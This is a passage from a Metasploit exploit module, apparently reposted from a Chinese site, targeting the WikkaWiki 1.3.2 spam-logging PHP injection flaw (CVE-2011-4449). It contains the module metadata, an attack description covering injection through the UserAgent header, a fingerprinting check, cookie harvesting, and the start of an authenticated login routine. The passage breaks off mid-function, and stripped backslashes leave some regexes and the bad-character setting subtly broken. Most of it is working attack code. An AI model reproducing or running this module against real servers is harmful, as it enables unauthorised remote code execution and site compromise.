WikkaWiki 1.3.2 Spam Logging PHP注射的方法

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",

'Description' => %q{

This module exploits a vulnerability found in WikkaWiki. When the spam logging

feature is enabled, it is possible to inject PHP code into the spam log file via the

UserAgent header , and then request it to execute our payload. There are at least

three different ways to trigger spam protection, this module does so by generating

10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).

Please note that in order to use the injection, you must manually pick a page

first that allows you to add a comment, and then set it as 'PAGE'.

},

'License' => MSF_LICENSE,

'Author' =>

[

'EgiX', #Initial discovery, PoC

'sinn3r' #Metasploit

],

'References' =>

[

['CVE', '2011-4449'],

['OSVDB', '77391'],

['EDB', '18177'],

['URL', 'http:// www.jb51.net /trac/wikka/ticket/1098']

],

'Payload' =>

{

'BadChars' => "x00"

},

'DefaultOptions' =>

{

'ExitFunction' => "none"

},

'Arch' => ARCH_PHP,

'Platform' => ['php'],

'Targets' =>

[

['WikkaWiki 1.3.2 r1814', {}]

],

'Privileged' => false,

'DisclosureDate' => "Nov 30 2011",

'DefaultTarget' => 0))

register_options(

[

OptString.new('USERNAME', [true, 'WikkaWiki username']),

OptString.new('PASSWORD', [true, 'WikkaWiki password']),

OptString.new('PAGE', [true, 'Page to inject']),

OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])

], self.class)

end

def check

res = send_request_raw({

'method' => 'GET',

'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"

})

if res and res.body =~ /Powered by WikkaWiki/

return Exploit::CheckCode::Detected

else

return Exploit::CheckCode::Safe

end

end

#

# Get the cookie before we do any of that login/exploity stuff

#

def get_cookie

res = send_request_raw({

'method' => 'GET',

'uri' => "#{@base}wikka.php"

})

# Get the cookie in this format:

# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka

if res and res.headers['Set-Cookie']

cookie = res.headers['Set-Cookie'].scan(/(w+=w+); path=.+$/).flatten[0]

else

raise RuntimeError, "#{@peer} - No cookie found, will not continue"

end

cookie

end

#

# Do login, and then return the cookie that contains our credential

#

def login(cookie)

# Send a request to the login page so we can obtain some hidden values needed for login

uri = "#{@base}wikka.php?wakka=UserSettings"

res = send_request_raw({

'method' => 'GET',

'uri' => uri,

'cookie' => cookie

})

# Extract the hidden fields

login = {}

if res and res.body =~ /